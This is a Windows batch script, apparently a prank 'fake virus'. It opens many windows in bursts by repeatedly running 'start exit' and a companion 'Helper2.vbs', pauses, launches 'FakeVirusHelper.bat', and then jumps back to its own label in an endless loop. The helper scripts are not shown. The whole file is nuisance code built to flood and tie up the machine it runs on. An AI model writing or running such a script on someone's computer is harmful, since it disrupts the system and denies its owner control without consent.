
echo off
cls
: BatchFile1!78
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
timeout 3
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs

timeout 3
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs

timeout 3
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs

timeout 3
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs

timeout 3
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs
start exit
start Helper2.vbs

timeout 3
start FakeVirusHelper.bat
goto BatchFile1!78